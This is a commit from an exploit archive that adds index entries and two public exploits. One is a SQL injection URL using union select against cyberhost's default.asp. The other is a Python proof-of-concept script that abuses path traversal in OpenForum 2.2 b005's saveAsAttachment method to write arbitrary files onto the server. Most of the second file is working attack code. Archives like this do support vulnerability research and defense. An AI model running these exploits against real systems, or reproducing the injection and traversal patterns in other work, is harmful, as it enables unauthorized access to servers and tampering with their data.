Updated 07_13_2014
This commit is contained in:
Offensive Security
parent
7d14cd14d8
commit
6d75764f0a
3 changed files with 101 additions and 0 deletions
|
|
@ -30651,3 +30651,5 @@ id,file,description,date,author,platform,type,port
|
|||
34031,platforms/php/webapps/34031.txt,"gpEasy CMS 1.6.2 'editing_files.php' Cross Site Scripting Vulnerability",2010-05-18,"High-Tech Bridge SA",php,webapps,0
|
||||
34032,platforms/php/webapps/34032.txt,"NPDS Revolution 10.02 'admin.php' Cross-Site Request Forgery Vulnerability",2010-05-20,"High-Tech Bridge SA",php,webapps,0
|
||||
34033,platforms/hardware/remote/34033.html,"Cisco DPC2100 2.0.2 r1256-060303 Multiple Security Bypass and Cross-Site Request Forgery Vulnerabilities",2010-05-24,"Dan Rosenberg",hardware,remote,0
|
||||
34034,platforms/asp/webapps/34034.txt,"cyberhost 'default.asp' SQL Injection Vulnerability",2010-05-22,redst0rm,asp,webapps,0
|
||||
34035,platforms/php/webapps/34035.sjs,"OpenForum 2.2 b005 'saveAsAttachment()' Method Arbitrary File Creation Vulnerability",2010-05-23,"John Leitch",php,webapps,0
|
||||
|
|
|
|||
|
Can't render this file because it is too large.
|
7
platforms/asp/webapps/34034.txt
Executable file
7
platforms/asp/webapps/34034.txt
Executable file
|
|
@ -0,0 +1,7 @@
|
|||
source: http://www.securityfocus.com/bid/40357/info
|
||||
|
||||
cyberhost is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
||||
|
||||
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
http://www.example.com/default.asp?gb=paketayrinti&id=18+union+select+0,1,2,3,4,5,6,7+from+uye
|
||||
92
platforms/php/webapps/34035.sjs
Executable file
92
platforms/php/webapps/34035.sjs
Executable file
|
|
@ -0,0 +1,92 @@
|
|||
source: http://www.securityfocus.com/bid/40364/info
|
||||
|
||||
OpenForum is prone to a vulnerability that may allow remote attackers to create arbitrary files on a vulnerable system.
|
||||
|
||||
Successful exploits will allow an attacker to create arbitrary files, which may then be executed to perform unauthorized actions. This may aid in further attacks.
|
||||
|
||||
OpenForum 2.2 b005 is vulnerable; other versions may also be affected.
|
||||
|
||||
#============================================================================================================#
|
||||
# _ _ __ __ __ _______ _____ __ __ _____ _ _ _____ __ __ #
|
||||
# /_/\ /\_\ /\_\ /\_\ /\_\ /\_______)\ ) ___ ( /_/\__/\ ) ___ ( /_/\ /\_\ /\_____\/_/\__/\ #
|
||||
# ) ) )( ( ( \/_/( ( ( ( ( ( \(___ __\// /\_/\ \ ) ) ) ) )/ /\_/\ \ ) ) )( ( (( (_____/) ) ) ) ) #
|
||||
# /_/ //\\ \_\ /\_\\ \_\ \ \_\ / / / / /_/ (_\ \ /_/ /_/ // /_/ (_\ \/_/ //\\ \_\\ \__\ /_/ /_/_/ #
|
||||
# \ \ / \ / // / // / /__ / / /__ ( ( ( \ \ )_/ / / \ \ \_\/ \ \ )_/ / /\ \ / \ / // /__/_\ \ \ \ \ #
|
||||
# )_) /\ (_(( (_(( (_____(( (_____( \ \ \ \ \/_\/ / )_) ) \ \/_\/ / )_) /\ (_(( (_____\)_) ) \ \ #
|
||||
# \_\/ \/_/ \/_/ \/_____/ \/_____/ /_/_/ )_____( \_\/ )_____( \_\/ \/_/ \/_____/\_\/ \_\/ #
|
||||
# #
|
||||
#============================================================================================================#
|
||||
# #
|
||||
# Vulnerability............Arbitrary File Write #
|
||||
# Software.................Open Forum Server 2.2 b005 #
|
||||
# Download.................http://code.google.com/p/open-forum #
|
||||
# Date.....................5/23/10 #
|
||||
# #
|
||||
#============================================================================================================#
|
||||
# #
|
||||
# Site.....................http://cross-site-scripting.blogspot.com/ #
|
||||
# Email....................john.leitch5@gmail.com #
|
||||
# #
|
||||
#============================================================================================================#
|
||||
# #
|
||||
# ##Description## #
|
||||
# #
|
||||
# An arbitrary file write vulnerability in the saveAsAttachment method of Open Forum Server 2.2 b005 can be #
|
||||
# exploited to write to the local file system of the server. #
|
||||
# #
|
||||
# #
|
||||
# ##Exploit## #
|
||||
# #
|
||||
# Upload a get.sjs file that calls the vulnerable method. Request the script's containing folder. #
|
||||
# #
|
||||
# #
|
||||
# ##Proof of Concept## #
|
||||
# #
|
||||
import sys, socket
|
||||
host = 'localhost'
|
||||
port = 80
|
||||
|
||||
def send_request(request):
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
s.settimeout(32) # sometimes it takes a while
|
||||
s.connect((host, port))
|
||||
s.send(request)
|
||||
|
||||
response = s.recv(8192) + s.recv(8192) # a hack within a hack
|
||||
|
||||
return response
|
||||
|
||||
def write_file():
|
||||
try:
|
||||
content = '----x--\r\n'\
|
||||
'Content-Disposition: form-data; name="file"; filename="get.sjs"\r\n'\
|
||||
'Content-Type: application/octet-stream\r\n\r\n'\
|
||||
'fileName = "' + '..\\\\' * 256 + 'x.txt";\r\n'\
|
||||
'data = "hello, world";\r\n'\
|
||||
'user = transaction.getUser();\r\n'\
|
||||
'wiki.saveAsAttachment("x",fileName,data,user);\r\n'\
|
||||
'transaction.sendPage("File Written");\r\n\r\n'\
|
||||
'----x----\r\n'
|
||||
|
||||
response = send_request('POST OpenForum/Actions/Attach?page=OpenForum HTTP/1.1\r\n'
|
||||
'Host: ' + host + '\r\n'
|
||||
'Content-Type: multipart/form-data; boundary=--x--\r\n'
|
||||
'Content-Length: ' + str(len(content)) + '\r\n\r\n' + content)
|
||||
|
||||
if 'HTTP/1.1 302 Redirect' not in response:
|
||||
print 'Error writing get.sjs'
|
||||
return
|
||||
else: print 'get.sjs created'
|
||||
|
||||
response = send_request('GET OpenForum HTTP/1.1\r\n'
|
||||
'Host: ' + host + '\r\n\r\n')
|
||||
|
||||
if 'File Written' not in response:
|
||||
print 'Error writing to root'
|
||||
return
|
||||
else: print 'x.txt created in root'
|
||||
|
||||
except Exception:
|
||||
print sys.exc_info()
|
||||
|
||||
write_file()
|
||||
Loading…
Add table
Reference in a new issue